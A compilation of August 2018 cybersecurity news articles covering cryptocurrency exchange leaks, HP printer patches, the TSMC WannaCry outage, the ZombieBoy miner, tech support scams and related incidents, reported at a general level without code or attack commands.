Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges
7.8.2018 securityaffairs Cryptocurrency

Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents.
Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, has investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.

The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.

In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges

January holidays for hackers: a 689% surge in the number of leaks

The report «2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis»shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.

cryptocurrency exchanges affected

Toolkit and infrastructure used for attacks

Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

cryptocurrency exchanges affected

The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as the Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.

What makes a successful attack possible?

This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.

Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).

cryptocurrency exchanges affected

Attack as a premonition

Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.

“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functional of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”

Recommendations of Group-IB experts to users and exchanges

In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.

Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.


HP releases firmware updates for two critical RCE flaws in Inkjet Printers
7.8.2018 securityaffairs
Vulnerebility

HP has released firmware updates that address two critical remote code execution vulnerabilities in some models of inkjet printers.
HP has released firmware updates to address two critical RCE flaws affecting some Inkjet printers. The two flaws, tracked as CVE-2018-5924 and CVE-2018-5925, could be exploited by attackers to trigger stack or static buffer overflow.

An attacker can exploit the vulnerabilities by sending a specially crafted file to the vulnerable inkjet printers.

“Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.” reads the security advisory published by HP.

The flaws have been assigned a CVSS score of 9.8 and affected roughly 160 models, including PageWide, DesignJet, Officejet, Deskjet, Envy, and Photosmart.

To download the firmware updates, go to the HP Software and Drivers page for your product and find the appropriate firmware update from the list of available software.
Go to the Upgrading Printer Firmware page and follow the instructions provided to install the firmware.

HP inkjet printers hacking

Flaws in the firmware of printers are not a novelty, in NNovember2017, experts from FoxGlove Security firm found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers.

Recently HP launched a private bug bounty program that offers up to $10,000 to white hat hackers that will discover serious issues in its printers.


Ex-Tesla Worker Accused of Hacking Seeks $1M in Counterclaim

6.8.2018 securityweek  Hacking

Tesla Breach

RENO, Nev. (AP) — A former Tesla Inc. employee at the electric car maker's battery plant in Nevada is seeking at least $1 million in defamation damages after it accused him of sabotage, hacking into computers and stealing confidential information leaked to the media.

Lawyers for Martin Tripp filed a counterclaim in federal court this week alleging any damages Tesla incurred were caused or contributed to by Tesla's "own negligence, acts or omissions."

Tripp alleges that between $150 million and $200 million worth of battery module parts for Tesla's Model 3 vehicle were incorrectly handled as scrap earlier this year. He said more than 700 dented and/or punctured battery modules were not discarded and instead were being shipped or were in the process of being shipped to customers.

A punctured battery could pose a fire risk.

Tesla officials did not respond to repeated requests for comment from The Associated Press on Thursday.

Tripp said he was recruited by Tesla, moved to Sparks, Nevada, from Wisconsin and started working at the battery factory in October 2017 as a lead process engineering technician. He was fired June 19.

Tesla filed the lawsuit against Tripp on June 20, three days after Musk warned employees of sabotage from within the company.

In the months prior, Tripp witnessed "several concerning business practices" inconsistent with Tesla's representations to investors and the general public, according to his counterclaim filed in U.S. District Court in Reno on Tuesday.

Tripp said he repeatedly questioned supervisors about the large quantities of waste and scrap vehicle parts he observed "lying haphazardly on the ground inside the Gigafactory." But his concerns were never addressed or resolved, Tripp said.

Tripp said he emailed CEO Elon Musk directly about his concerns on May 16 before Musk was scheduled to visit the factory east of Sparks that night. Later that day, Tripp said his manager asked him to forward the email he sent to Musk "so that I can avoid getting fired tonight," according to the lawsuit.

His counterclaim says a design engineer also told Tripp to clean up the production line area so Musk wouldn't see the mounds of scrap and waste lying on the ground, but Tripp declined to do so because he wanted Musk "to see how the Gigafactory was actually being operated." He said he was reassigned to a different position the following day.

Tesla's original lawsuit said Tripp admitted to Tesla investigators that he wrote software that transferred several gigabytes of data outside the company, including dozens of photographs and a video, according to the lawsuit filed Wednesday. Hacking software from Tripp also was running on three computer systems of other employees "so that the data would be exported even after he left the company and so that those individuals would be falsely implicated," the lawsuit alleged.

The lawsuit said Tripp made false claims about the information he stole, including claims that Tesla used punctured battery cells in the Model 3, and claims about the amount and value of scrap material generated by Tesla's manufacturing process. Some of the claims made it into media stories about the company, but media organizations are not identified in the lawsuit.

Tripp, a former aviation electronics technician in the U.S. Navy who worked two decades in the electronic and engineering industries, said in his counterclaim he "did not sabotage Tesla or its operations" and his actions "were necessary, reasonable and/or privileged."

He acknowledged in the counterclaim that he had made claims about the scrap and punctured battery cells being used in Model 3 vehicles. But he said he did not direct code changes to the Tesla Manufacturing Operating System under false user names or export large amounts of highly sensitive Tesla data as Musk had asserted.

After he was reassigned to a new position, Tripp "learned of and witnessed additional unnerving, dangerous and wasteful business practices," including employees systematically reusing parts and battery cells that had been previously discarded as waste, the suit said.

The scrap problem dramatically increased in March 2018 when Tesla initiated a company-wide effort to reach its publicized goal of producing 2,500 Model 3 vehicles per week, the lawsuit said. It said the production push — with an objective of making 5,000 vehicles per week by July 2018 — was known as the "March to 2,500."


GitHub to Warn Users on Compromised Passwords
6.8.2018 securityweek  Incindent

In a move to protect its users, software repository site GitHub is now alerting account holders whenever it detects that a password has been compromised in breaches on other services.

Security experts have long pushed for the use of long, unique passwords, to ensure stronger security of all online accounts. However, even unique passwords can pose a great risk when compromised, especially if attackers can link them to specific accounts.

The new feature is the result of a partnership with Troy Hunt, the security researcher behind the popular HaveIBeenPwned.com project. The service allows users to check whether their accounts and passwords have appeared in any data breaches.

An internal tool GitHub has created is now taking advantage of a 517 million record dataset that Hunt made available for download through its service to “validate whether a user’s password has been found in any publicly available sets of breach data.”

The open-source software repository platform enabled the feature last week. The functionality, it says, it meant to alert all people who are using compromised passwords and prompt them to select a different one during login, registration, or when updating their password.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” GitHub explains.

Users who have two-factor authentication (2FA) enabled will receive periodic warnings to review the 2FA setup and recovery options, GitHub also reveals.

However, traditional 2FA options such as SMS have proven to be unreliable, and all of the online platform’s users are advised to use a 2FA authenticator application that supports cloud backups, to ensure a recovery option is always available for them.

“These new account security enhancements will help improve the security of your account. We hope you will take this opportunity to review the security of your account. Balancing security, usability, and recoverability is a personal decision,” GitHub notes.

The service’s users are advised to generate strong, unique passwords using a dedicated manager, to enable 2FA, and to make sure an account-recovery method is available. They should also update their primary email address if necessary and review their other credentials on the platform, GitHub says.

GitHub, which will soon become part of Microsoft, has made other security improvements as well, including the enforcing of SSL/TLS. This, however, did not stop hackers from compromising accounts to spread malicious code, as was the case with the recent Gentoo incident.


HP Patches Critical RCE Flaws in Inkjet Printers
6.8.2018 securityweek 
Vulnerebility

HP has released firmware updates for many of its ink printers to address a couple of critical vulnerabilities that can be exploited for remote code execution.

According to the HP Product Security Response Team (PSRT), the company’s Inkjet printers are affected by flaws that allow an attacker to trigger a stack or static buffer overflow and execute arbitrary code by sending a specially crafted file to an affected device.

The vulnerabilities are tracked as CVE-2018-5924 and CVE-2018-5925, and they have both been assigned a CVSS score of 9.8.

HP has shared a list of roughly 160 impacted products, including PageWide, DesignJet, Officejet, Deskjet, Envy and Photosmart devices. The firmware updates for each impacted product can be obtained from HP’s website.

This is not the first time a remote code execution flaw has been found in HP printers. Last year, researchers discovered several potentially serious vulnerabilities in some of HP’s enterprise printers, including an RCE bug affecting LaserJet Enterprise, PageWide Enterprise, LaserJet Managed and OfficeJet Enterprise printers.

HP recently announced the launch of a private bug bounty program that offers up to $10,000 for serious vulnerabilities found in the company’s printers. HP had invited 34 researchers by the time the initiative was unveiled.

The program covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).


Campaigns on Their Own as Cyber Threats Roil Midterms
6.8.2018 securityweek  Cyber

NEW YORK (AP) — Kamala Harris has been the target of social media misinformation campaigns since she became a U.S. senator.

Every month for the last 18 months, her office has discovered on average between three and five fake Facebook profiles pretending to be hers, according to a Harris aide. It's unclear who creates the pages, which are often designed to mislead American voters about the ambitious Democratic senator's policies and positions.

The aide spoke on the condition of anonymity, like more than a half dozen campaign officials contacted for this story, for fear of attracting unwanted attention from adversaries or scrutiny on the Senate office's evolving cybersecurity protocols.

Such internet mischief has become commonplace in U.S. politics. Facebook announced earlier this week that it uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms. Senior intelligence officials declared Thursday that foreign adversaries continue waging a quiet war against U.S. campaigns and election systems.

Still, one thing has become clear: With the midterm elections just three months away, campaigns are largely on their own in the increasingly challenging task of protecting sensitive information and countering false or misleading content on social media.

The Democratic National Committee has worked to strengthen its own internal security protocols and encouraged state parties to do the same, according to Raffi Krikorian, who previously worked for Uber and Twitter and now serves as the DNC's chief technology officer.

But in an interview, he acknowledged there are limits to how much the national party can protect the thousands of Democratic campaigns across the country.

"We're providing as much assistance to campaigns as we can, but there's only so much we can do," Krikorian said.

"For all the high-level campaigns I'm worried, but at least there are people to talk to," he continued. "The mid-sized campaigns are at least getting technical volunteers, but the truly down-ballot campaigns, that's where the state parties and coordinated campaigns can help, but there's no doubt that this is an uphill battle when we're dealing with a foreign adversary."

Officials in both political parties have intensified cybersecurity efforts, although the known cases of interference have so far overwhelmingly focused on Democrats.

The DNC now has a staff of 40 on its technical team, led by Krikorian and other Silicon Valley veterans hired in the months after Russians hacked the party's email system and released a trove of damaging messages in the months before President Donald Trump's 2016 victory.

Top U.S. intelligence and homeland security officials raised new alarms Thursday about outside efforts to influence the 2018 and 2020 elections during a White House press briefing.

Homeland Security chief Kirstjen Nielsen said: "Our democracy is in the crosshairs," while Director of National Intelligence Dan Coats added: "We continue to see a pervasive messaging campaign by Russia to try to weaken and divide the United States."

Facebook said it removed 32 accounts from its site and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts, which featured names such as "Black Elevation" and "Resisters" and were designed to manipulate Americans with particular ethnic, cultural or political identities.

In many cases, House and Senate political campaigns said they're just beginning to adopt basic internal security protocols, such as two-step verification for all email, storage and social media accounts and encrypted messaging services such as Wickr.

There is no protocol in place for campaigns or national parties to monitor broader social media misinformation campaigns, however. Nor is there any sign that law enforcement is playing a proactive role to protect campaigns from meddling on a day-to-day basis.

The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression, but campaigns report no regular contact with law enforcement officials.

"At the end of the day, the U.S. government is not putting any type of a bubble around any (campaign). They do not have the authority, capacity or capability to do it," said Shawn Henry, a former senior FBI official who now leads the cybersecurity firm CrowdStrike, which works with political campaigns. "NSA is not sitting in the ISPs filtering out malicious traffic."

Henry added: "They've got to take pro-active actions themselves."

Earlier this month, Microsoft said it discovered a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said this week that additional analysis confirmed the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017. Former Democratic U.S. Rep. Brad Ashford of Nebraska also recently confirmed that his 2016 campaign emails had been hacked by Russian agents.

Ashford, who narrowly lost his seat to Republican Don Bacon that year, said hackers obtained all of his campaign email correspondence with the Democratic Congressional Campaign Committee. He said he was notified of the breach in late July or early August 2016 by House Democratic Leader Nancy Pelosi's office.

Ashford has said he doesn't believe any of the stolen information ever went to Bacon or the Republican Party, and he doesn't know whether it made a difference in his race. He did face a series of anonymous political attacks on social media.

By their very nature, U.S. political campaigns can be a challenge to defend from a cybersecurity standpoint. They are essentially pop-up organizations that rely heavily on volunteers and are focused on a singular task — winning. In addition, high-level IT expertise costs money and campaigns typically run on tight budgets.

Some 2018 House campaigns have yet to hire basic communications staffers.

In the case of California Sen. Harris, who is considered a 2020 presidential prospect, her office plans to continue rooting out fake social media profiles on its own. They have had no contact with the FBI. They have reported the issue to Facebook in every case — not the other way around.

"It's on the forefront of everybody's mind," said Patrick McHugh, a former Senate campaign official who now leads the Democratic-aligned super PAC Priorities USA.

He acknowledged the tremendous challenge for many campaigns.

"All it takes is one person on a campaign to make a mistake," McHugh said. "You're up against a foreign country. That's a pretty big adversary that can and will go to all ends to get in."


New Open Source Tools Help Find Large Twitter Botnets
6.8.2018 securityweek  BotNet

Duo Security has created open source tools and disclosed techniques that can be useful in identifying automated Twitter accounts, which are often used for malicious purposes.

The trusted access solutions provider, which Cisco recently agreed to acquire for $2.35 billion, has collected and studied 88 million Twitter accounts and over half-a-billion tweets. Based on this data, which the company says is one of the largest random datasets of Twitter accounts analyzed to date, researchers were able to create algorithms for differentiating humans from bots.

The dataset, collected using Twitter’s API, includes profile name, tweet and follower count, avatar, bio, content of tweets, and social network connections.

Researchers created their tools and techniques for identifying bots based on 20 unique account characteristics, including the number of digits in a screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, and average hours tweeted per day.

Tests conducted by experts led to the discovery of a sophisticated cryptocurrency-related scam botnet powered by at least 15,000 bots. These accounts were designed to use deceptive behaviors to avoid automatic detection, while attempting to obtain money from users by spoofing cryptocurrency exchanges, celebrities and news organizations.

Duo Security informed Twitter of its findings. The social media giant says it’s aware of the problem and claims it’s proactively implementing mechanisms to detect problematic accounts.

“Spam and certain forms of automation are against Twitter's rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections. When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter's API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related,” Twitter said.

Duo Security has published a 46-page research paper describing its findings and techniques. The company will release its tools as open source on August 8 at the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” explained Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”


Mozilla to Researchers: Stay Away From User Data and We Won’t Sue
6.8.2018 securityweek  Security

Security researchers looking to find bugs in Firefox should not worry about Mozilla suing them, the Internet organization says. That is, of course, as long as they don’t mess with user data.

Mozilla, which has had a security bug bounty program for over a decade, is discontent with the how legal issues are interfering with the bug hunting process and has decided to change its bug bounty program policies to mitigate that.

Because legal protections afforded to those participating in bounty programs failed to evolve, security researchers are often at risk, and the organization is determined to offer a safe harbor to those researchers seeking bugs in its web browser.

According to the Internet organization, bug bounty participants could end up punished for their activities under the Computer Fraud and Abuse Act (CFAA),the anti-hacking law that criminalizes unauthorized access to computer systems.

“We often hear of researchers who are concerned that companies or governments may take legal actions against them for their legitimate security research. […] The policy changes we are making today are intended to create greater clarity for our own bounty program and to remove this legal risk for researchers participating in good faith,” Mozilla says.

For that, the browser maker is making two changes to its policy. On the one hand, the organization has clarified what is in scope for its bug bounty program, while on the other it has reassured researchers it won’t take legal action against them if they don’t break the rules.

Now, Mozilla makes it clear that participants to its bug bounty program “should not access, modify, delete, or store our users’ data.” The organization also says that it “will not threaten or bring any legal action against anyone who makes a good faith effort to comply with our bug bounty program.”

Basically, the browser maker says it won’t sue researchers under any law (the DMCA and CFAA included) or under its applicable Terms of Service and Acceptable Use Policy for their research performed as part of the bug bounty program.

“We consider that security research to be ‘authorized’ under the CFAA,” Mozilla says.

These changes, which are available in full in the General Eligibility and Safe Harbor sections of organization’s main bounty page, should help researchers know what to expect from Mozilla.


Fortnite APK is coming soon, but it will not be available on the Google Play Store
6.8.2018 securityaffairs Android

Fortnite, the most popular game will be soon available for Android users but the Fortnite APK will not be in the Play Store.
Fortnite continues to be the most popular game, it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The great success obtained by the Fortnite attracted cyber criminals that are attempting to exploit its popularity to target its fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet, it is currently under development while the iOS version was released in March by Epic Games.

In the recent months, crooks attempted to take advantage of Android users’ interest in an alleged version for their devices of the popular game.

Experts discovered many blog posts and video tutorial with instructions to install fake Fortnite Android App.

Scammers are exploiting this interest to trick Android fans into downloading tainted version of the game that can compromise Android devices.

Fortnite APK

Now there is a news for the Android fans of the popular game, Epic Games confirmed the Fortnite APK for Android will be available for download exclusively only through its official website and not through the official Google Play Store.

According to the Epic Games CEO Tim Sweeney in this way, the company will have “have a direct relationship” with its consumers and will allow saving 30 percent fee that Google maintains when users download a software from the Play Store.

“The awesome thing about Fortnite is it’s brought a huge volume of digital commerce to Epic. We can now do that very efficiently. We can handle payment processing and customer support and download bandwidth with some great deals. We’re passing the savings along with the Unreal Engine Marketplace. We’ve change the royalty split from the 30/70 you see everywhere to developers getting 88 percent. We find that’s a great boon for developers.” Sweeney told GamesBeat.

Sweeney explained that the share of profits for the version running on Microsoft or Nintendo is right because the “enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers.”

Sweeney considers disproportionate 30% cut on the fee applied by Google for its services but evidently doesn’t evaluate the security features implemented by the Google store to avoid crooks will serve tainted versions of the Fortnite APK.

Even if in the past we have found several malicious apps uploaded to the Play Store, we cannot underestimate the Google’s efforts for the security of its users.

The availability of Fortnite APK on a third-party website could expose Android users to the risk of infection.

The only way to download an APK from a third-party store is to manually enable “Install Apps from Unknown Sources” option in the settings.

A large number of Android users will search “how to install Fortnite on Android,” these fans could be targeted in various ways, for example in black SEO campaigns devised to infect their devices.

“The move will simply encourage users to manually enable “Install Apps from Unknown Sources” option in the settings menu or accept a variety of Android security prompts in order to install Fortnite game directly from the Epic Games website.” reported The Hacker News.

“So, thousands of people out there searching, “how to install Fortnite on Android” or “how to download Fortnite APK for Android” on the Internet, could land themselves on unofficial websites, ending up installing malware.”

In order to install Fortnite on Android, players will have to download the Fortnite Launcher from the official Epic website, then it will allow them to load the Fortnite Battle Royale onto their devices.

Attackers can impersonate the legitimate source, for example by carrying out phishing campaign to trick Android users into downloading tainted version of Fortnite APK.


Chip Giant TSMC Says WannaCry Behind Production Halt
6.8.2018 securityweek
Ransomware

TSMC Chip Factory hit by Malware

Image Source: Taiwan Semiconductor Manufacturing Co., Ltd.

Chipmaker giant Taiwan Semiconductor Manufacturing Co (TSMC) said Monday the computer virus that brought its production to a halt for two days was a variant of the WannaCry ransomware that hit users all around the world.

WannaCry infected more than 200,000 users in more than 150 countries last year, encrypting user files and demanding ransom payments from their owners to get them back.

TSMC -- a key Apple supplier -- said some its computer systems and equipment in its Taiwan plants were infected on August 3 during software installation, which is expected to cause shipment delays and cutting third-quarter revenue by two percent.

It comes as Apple is set to release new iPhone models later this year.

TSMC declined to specify which customers and products are affected by the brief outage, but it said no confidential information was compromised.

Chief Executive Officer C.C. Wei told reporters and analysts on Monday that the virus has been eliminated and all production is back online.

Wei ruled out the incident as a hack targeted at the company, but an oversight by employees to conduct virus scans properly.

"This is purely our negligence so I don't think there is any hacking behaviour," he said.

"We regret this. There won't be any more human errors," said Wei.

He added that TSMC will develop a more automated anti-virus procedure going forward.

The firm said it is in close contact with its customers to minimise the impact, and maintains its sales growth outlook for the year.


Dept. of Energy announced the Liberty Eclipse exercise to test electrical grid against cyber attacks
6.8.2018 securityaffairs Attack

DoE announced the Liberty Eclipse exercise to test the electrical grid ‘s ability to recover from a blackout caused by cyberattacks.
This is the first time the Department of Energy will test the electrical grid’s ability to recover from a blackout caused by cyberattacks.

We have discussed many times the effects of a cyber attack against an electrical grid, the most scaring scenario sees wide power outage bringing population in the dark.

Is this a feasible scenario for the US critical infrastructure?

The Department of Energy wants to test the resilience of an electrical grid to a cyber attack, so it’s going to launch the first hands-on exercise to test the ability of the operators of such infrastructure in recovering from a blackout caused by a cyber attack.

According to the E&E News website, the Department of Energy plans to conduct a weeklong experiment, dubbed ‘Liberty Eclipse,’ that will take place starting Nov. 1 on a restricted area off the cost of New York called Plum Island.

“The Department of Energy is planning an unprecedented, “hands-on” test of the grid’s ability to bounce back from a blackout caused by hackers, E&E News has learned.” reported the E&E News website.

“The “Liberty Eclipse” exercise will simulate the painstaking process of re-energizing the power grid while squaring off against a simultaneous cyberattack on electric, oil and natural gas infrastructure. The weeklong stress test is scheduled to take place this November on Plum Island, a restricted site off the coast of New York that houses a Department of Homeland Security animal disease center.”

This is the first time that the Department of Energy is planning such kind of “hands-on” test of the grid’s ability to restore operations from a blackout caused by a cyber attack. The “Liberty Eclipse” exercise aims at evaluating the response of the infrastructure to coordinated attacks against an electric, oil and natural gas infrastructure. The DOE wants to prepare the infrastructure of the country for threats.

“It’s in our national security interest to continue to protect these sources of energy and to deliver them around the world,” Energy Secretary Rick Perry said at a cybersecurity conference in New York last week.

“Taking care of that infrastructure, from the standpoint of protecting it from cyberattacks — I don’t think it’s ever been more important than it is today.”

electrical grid

The goal of the Liberty Eclipse exercise is to prepare the response to a major incident caused by cyber attacks, that could be frequent events in a short future. Utilities that have to restore electricity following massive blackouts first need to provide initial jump of electricity before they can start generating it.

This operation is done by the operators by using diesel generators and other blackstart sources to choreograph “cranking paths” for restoring the functions of the electrical grid.

“Utilities can’t just flip a few switches to bring the lights on following a major shutdown. In fact, power plants typically need an initial jump of electricity before they can start generating it.” continues the E&E News website. Power companies rely on diesel generators and other blackstart sources to choreograph “cranking paths” for bringing the grid on its feet. Once enough pockets of electricity have been brought online, operators can sync up the islands with the wider grid.”

The entire process is time-consuming and can take many hours to be completed, even under the most favorable circumstances.

The DOE aims at speed up the restoration of the electrical grid by incorporating simulated cranking paths, provided by the Defense Advanced Research Projects Agency, that were designed for this reason.

“Together, [participants] will work to energize a blackstart cranking path by detecting the attack, cleaning malicious influence, and restoring crank path digital systems to operation,” the DOE states in a planning memo from last month.

This is the first exercise that is going to test the “blackstart” cranking paths that were excluded from previous simulations.


TCM Bank: website misconfiguration exposed applicant data for 16 months
6.8.2018 securityaffairs Hacking

TCM Bank announced that a Web site misconfiguration exposed applicant data for 16 months, between early March 2017 and mid-July 2018
TCM Bank, a subsidiary of ICBA Bancard, serves as a trusted advisor to community banks, it serves as a direct issuer of credit cards for more than 750 small and community U.S. banks who prefer not to issue cards themselves.

TCM Bank announced that a Web site misconfiguration exposed applicant data for 16 months, including names, addresses, dates of birth and Social Security numbers.

“In a letter being mailed to affected customers today, TCM said the information exposed was data that card applicants uploaded to a Web site managed by a third party vendor.” wrote the popular investigator Brian Krebs.

“TCM said it learned of the issue on July 16, 2018, and had the problem fixed by the following day.”

Thousands of people who applied for cards between early March 2017 and mid-July 2018 were affected by the incident.

The company notified the incident to the affected customers via email, data exposed belongs to card applicants uploaded to a Web site managed by a third party vendor.

The attorney Bruce Radke who is helping TCM confirmed that the number of affected customers is less than 10,000.

“It was less than 25 percent of the applications we processed during the relevant time period that were potentially affected, and less than one percent of our cardholder base was affected here,” Radke said.

“We’ve since confirmed the issue has been corrected, and we’re requiring the vendor to look at their technologies and procedures to detect and prevent similar issues going forward.”

TCM Bank

Businesses have to carefully review the level of security implemented by their partners to avoid those third-party incidents could have a significant impact on their operations.

“Many companies that experience a data breach or data leak are quick to place blame for the incident on a third-party that mishandled sensitive information. Sometimes this blame is entirely warranted, but more often such claims ring hollow in the ears of those affected — particularly when they come from banks and security providers.” concludes Krebs.

“Managing third-party risk can be challenging, especially for organizations with hundreds or thousands of partners”


ZombieBoy, a new Monero miner that allows to earn $1,000 on a monthly basis
6.8.2018 securityaffairs Cryptocurrency

A security researcher discovered a new crypto mining worm dubbed ZombieBoy that leverages several exploits to evade detection.
The security researcher James Quinn has spotted a new strain of crypto mining worm dubbed ZombieBoy that appears to be very profitable and leverages several exploits to evade detection.

The expert called this new malware ZombieBoy because it uses a tool called ZombieBoyTools to drop the first dll, it uses some exploits to spread.

Unlike MassMiner cryptocurrency miner, ZombieBoy leverages WinEggDrop instead of MassScan to search for new hosts to infect.

ZombieBoy

The cryptocurrency uses Simplified Chinese language, which suggests that its author is a Chinese coder.

The ZombieBoy mine leverages several exploits, including:

CVE-2017-9073, RDP vulnerability on Windows XP and Windows Server 2003
CVE-2017-0143, SMB exploit
CVE-2017-0146, SMB exploit
ZombieBoy also uses both NSA-linked exploits DoublePulsar and EternalBlue exploits to remotely install the main dll. The malware used the ZombieBoyTools to install the two exploits.

Once the has established a backdoor in the target system it could deliver other families of malware, such as ransomware, and keyloggers.

According to Quinn’s, the 64.exe module downloaded by ZombieBoy uses the DoublePulsar exploit to install both an SMB backdoor as well as an RDP backdoor.

The same component uses XMRIG to mine Monero coins at 43 KH/s, that means that users can earn $1,000 on a monthly base at the current rate.

“In addition, 64.exe uses XMRIG to mine for XMR. Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices.” continues the analysis.

Quinn highlighted that the miner is being updated constantly, he is observing new samples on a daily base.

The malware is able to detect VM and doesn’t run in a virtualized environment to make hard its detection.

Further details including IoCs are reported in the analysis published by the expert.


Tech Support Scams improved with adoption of Call Optimization Service
6.8.2018 securityaffairs
Spam

Security experts from Symantec are warning of tech support scams abusing Call Optimization Services to insert phone numbers.
Crooks are improving their tech support scams by using Call Optimization Services that are commonly used in legitimate call center operations to perform:

Tracking the source of inbound calls
Creation and management of phone numbers
Call load balancing
Call forwarding
Call analytics
Call routing
Call recording
Scammers continue to improve their techniques and now they are using the service to dynamically insert phone numbers into their scam web pages and potentially gain additional features to make their scams more successful

The scams begin when unaware victims visit a malicious website or are redirected to a bogus website in various ways such as a malvertising campaign.

“The scam web page informs the victim that the computer has been blocked due to a malware infection and tries to lure the user into calling a “toll free” number for assistance. An audio file, stating that the computer is infected, is also played in the background when the user arrives on the scam web page.” reads the analysis published by Symantec.

tech support scams

The malicious page implements some tricks to avoid victims will close the page. The pages show display notification dialogs in full-screen mode or execute a javascript routine that makes the site unresponsive.
The pages display a list of numbers to call to fix the problem and users in panic tend to call them.

According to Symantec, crooks leverages call optimization services in order to dynamically insert phone numbers into a scam page.

This specific tech support scams not only is performing browser fingerprinting, it retrieves the browser version as well based in which crooks redirect victims to different scam pages.

Crooks used a script in the call optimization services to check a specific tag in the scam URL, then the script retrieves the scammer’s phone number from the service’s servers. When the servers return the scammer’s phone number, the tag triggers the “Callback” function that retrieves and displays the appropriate phone number for victims to call.

If the tag from the call optimization service is not present in the scam URL, the phone number is retrieved by loading an XML file using the function loadXMLDoc() which is then displayed on the scam page.

The advantage of using the call optimization service’s tag in the URL is that it allows the scammers to dynamically insert phone numbers into their scam pages that are localized. “localized” to provide a different number based on the victim’s country.
Victims are shown a phone number that calls someone that speaks their language.
“However, by using the call optimization service’s tag in the URL the scammers can dynamically insert phone numbers into their scam pages,” continues Symantec.

“This can be useful, for example, if victims are based in multiple countries, as the victim can be shown a phone number that calls someone that speaks their language.”

Crooks can abuse Call Optimization Services in their tech support scams also for other goals, for example, to provide analytics, to implement load balancing during busy times to avoid losing calls.


Malware Hits Plants of Chip Giant TSMC
6.8.2018 securityweek
Virus

